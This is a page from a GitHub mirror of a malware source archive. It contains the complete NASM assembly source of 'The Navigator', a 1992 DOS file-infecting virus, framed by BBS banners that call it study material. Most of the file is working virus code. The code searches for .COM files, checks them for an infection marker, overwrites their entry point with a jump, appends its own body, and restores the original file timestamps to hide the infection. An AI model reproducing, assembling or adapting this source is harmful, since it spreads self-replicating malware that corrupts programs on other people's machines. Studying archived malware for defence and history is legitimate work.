mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-18 17:36:11 +00:00
202 lines
7.5 KiB
NASM
202 lines
7.5 KiB
NASM
;****************************************************************************;
|
||
; ;
|
||
; -=][][][][][][][][][][][][][][][=- ;
|
||
; -=] P E R F E C T C R I M E [=- ;
|
||
; -=] +31.(o)79.426o79 [=- ;
|
||
; -=] [=- ;
|
||
; -=] For All Your H/P/A/V Files [=- ;
|
||
; -=] SysOp: Peter Venkman [=- ;
|
||
; -=] [=- ;
|
||
; -=] +31.(o)79.426o79 [=- ;
|
||
; -=] P E R F E C T C R I M E [=- ;
|
||
; -=][][][][][][][][][][][][][][][=- ;
|
||
; ;
|
||
; *** NOT FOR GENERAL DISTRIBUTION *** ;
|
||
; ;
|
||
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
|
||
; Around Among the General Public. It Will be Very Useful for Learning how ;
|
||
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
|
||
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
|
||
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
|
||
; Is. Keep This Code in Responsible Hands! ;
|
||
; ;
|
||
;****************************************************************************;
|
||
;****************************************************************************
|
||
;* The Navigator *
|
||
;* *
|
||
;* Assembled with Tasm 2.5 *
|
||
;* *
|
||
;* (c) 1992 Dark Helmet, The Netherlands *
|
||
;* The author takes no responsibilty for any damages caused by the virus *
|
||
;* *
|
||
;* Special greetings to : *
|
||
;* Glenn Benton, XSTC for their nice source and viruses, *
|
||
;* Peter Venkman for his BBS, Marcel and Ziggy for keeping me of the *
|
||
;* work, Guns and Roses for their great music, *
|
||
;* and al the other viruswriters... *
|
||
;* *
|
||
;* " Trust me...I know what I'm doing" *
|
||
;* *
|
||
;*--------------------------------------------------------------------------*
|
||
;* *
|
||
;* Coming soon : The Anti-DAF Virus *
|
||
;* Civil War II *
|
||
;* *
|
||
;*--------------------------------------------------------------------------*
|
||
;* *
|
||
;* Used Books : - MSDOS voor gevorderen (tweede editie) *
|
||
;* Ray Duncan, ISBN 90 201 2299 1 (660 blz.) *
|
||
;* - PC Handboek voor programmeurs *
|
||
;* Robert Jourdain, ISBN 90 6233 443 1 (542 blz.) *
|
||
;* - Werken met Turbo Assembler *
|
||
;* Tom Swam, ISBN 90 6233 627 2 (903 blz.) *
|
||
;* *
|
||
;****************************************************************************
|
||
|
||
.Radix 16
|
||
|
||
Navigator Segment
|
||
Assume cs:Navigator, ds:Navigator,
|
||
org 100h
|
||
|
||
len equ offset last - begin
|
||
|
||
Dummy: db 0e9h, 03h, 00h, 44h, 48h, 00h
|
||
|
||
Begin: call virus
|
||
|
||
Virus: pop bp
|
||
sub bp,109h
|
||
mov dx,0fe00h
|
||
mov ah,1ah
|
||
int 21h
|
||
|
||
Restore_begin: mov di,0100h
|
||
lea si,ds:[buffer+bp]
|
||
mov cx,06h
|
||
rep movsb
|
||
|
||
First: lea dx,[com_mask+bp]
|
||
mov ah,04eh
|
||
xor cx,cx
|
||
int 21h
|
||
|
||
Open_file: mov ax,03d02h
|
||
mov dx,0fe1eh
|
||
int 21h
|
||
mov [handle+bp],ax
|
||
xchg ax,bx
|
||
|
||
Read_date: mov ax,05700h
|
||
int 21h
|
||
mov [date+bp],dx
|
||
mov [time+bp],cx
|
||
|
||
Check_infect: mov bx,[handle+bp]
|
||
mov ah,03fh
|
||
mov cx,06h
|
||
lea dx,[buffer+bp]
|
||
int 21h
|
||
mov al,byte ptr [buffer+bp]+3
|
||
mov ah,byte ptr [buffer+bp]+4
|
||
cmp ax,[initials+bp]
|
||
jne infect_file
|
||
|
||
Close_file: mov bx,[handle+bp]
|
||
mov ah,3eh
|
||
int 21h
|
||
|
||
Next_file: mov ah,4fh
|
||
int 21h
|
||
jnb open_file
|
||
jmp exit
|
||
|
||
Infect_file: mov ax,word ptr [cs:0fe1ah]
|
||
sub ax,03h
|
||
mov [lenght+bp],ax
|
||
mov ax,04200h
|
||
call move_pointer
|
||
|
||
Write_jump: mov ah,40h
|
||
mov cx,01h
|
||
lea dx,[jump+bp]
|
||
int 21h
|
||
mov ah,40h
|
||
mov cx,02h
|
||
lea dx,[lenght+bp]
|
||
int 21h
|
||
mov ah,40
|
||
mov cx,02h
|
||
lea dx,[initials+bp]
|
||
int 21h
|
||
|
||
Write_virus: mov ax,4202h
|
||
call move_pointer
|
||
mov ah,40h
|
||
mov cx,len
|
||
lea dx,[begin+bp]
|
||
int 21h
|
||
|
||
restore_date: mov dx,[date+bp]
|
||
mov cx,[time+bp]
|
||
mov bx,[handle+bp]
|
||
mov ax,05701h
|
||
int 21h
|
||
|
||
exit: mov bx,0100h
|
||
jmp bx
|
||
|
||
;----------------------------------------------------------------------------
|
||
|
||
move_pointer: mov bx,[handle+bp]
|
||
xor cx,cx
|
||
xor dx,dx
|
||
int 21h
|
||
ret
|
||
|
||
;----------------------------------------------------------------------------
|
||
|
||
com_mask db "*.com",0
|
||
handle dw ?
|
||
date dw ?
|
||
time dw ?
|
||
buffer db 090h,0cdh,020h,044h,048h,00h
|
||
initials dw 4844h
|
||
lenght dw ?
|
||
jump db 0e9h,0
|
||
msg db "The Navigator, (c) 1992 Dark Helmet",0
|
||
|
||
last db 090h
|
||
|
||
Navigator ends
|
||
end dummy
|
||
;****************************************************************************;
|
||
; ;
|
||
; -=][][][][][][][][][][][][][][][=- ;
|
||
; -=] P E R F E C T C R I M E [=- ;
|
||
; -=] +31.(o)79.426o79 [=- ;
|
||
; -=] [=- ;
|
||
; -=] For All Your H/P/A/V Files [=- ;
|
||
; -=] SysOp: Peter Venkman [=- ;
|
||
; -=] [=- ;
|
||
; -=] +31.(o)79.426o79 [=- ;
|
||
; -=] P E R F E C T C R I M E [=- ;
|
||
; -=][][][][][][][][][][][][][][][=- ;
|
||
; ;
|
||
; *** NOT FOR GENERAL DISTRIBUTION *** ;
|
||
; ;
|
||
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
|
||
; Around Among the General Public. It Will be Very Useful for Learning how ;
|
||
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
|
||
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
|
||
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
|
||
; Is. Keep This Code in Responsible Hands! ;
|
||
; ;
|
||
;****************************************************************************;
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> and Remember Don't Forget to Call <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
|